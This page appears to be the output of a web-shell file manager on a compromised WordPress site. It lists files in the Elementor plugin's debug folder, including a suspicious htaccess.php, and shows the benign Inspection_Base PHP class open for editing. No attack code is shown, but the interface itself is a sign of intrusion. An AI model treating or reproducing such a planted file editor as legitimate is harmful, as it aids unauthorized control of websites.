golden hour
/home/godaofbq/drhyperbaric.com/wp-content/plugins/elementor/core/debug/classes
⬆️ Go Up
Upload
File/Folder
Size
Actions
.htaccess
420 B
Del
OK
error_log
11.84 KB
Del
OK
htaccess.php
1.26 KB
Del
OK
inspection-base.php
502 B
Del
OK
shop-page-edit.php
709 B
Del
OK
theme-missing.php
645 B
Del
OK
Edit: inspection-base.php
<?php namespace Elementor\Core\Debug\Classes; abstract class Inspection_Base { /** * @return bool */ abstract public function run(); /** * @return string */ abstract public function get_name(); /** * @return string */ abstract public function get_message(); /** * @return string */ public function get_header_message() { return esc_html__( 'The preview could not be loaded', 'elementor' ); } /** * @return string */ abstract public function get_help_doc_url(); }
Save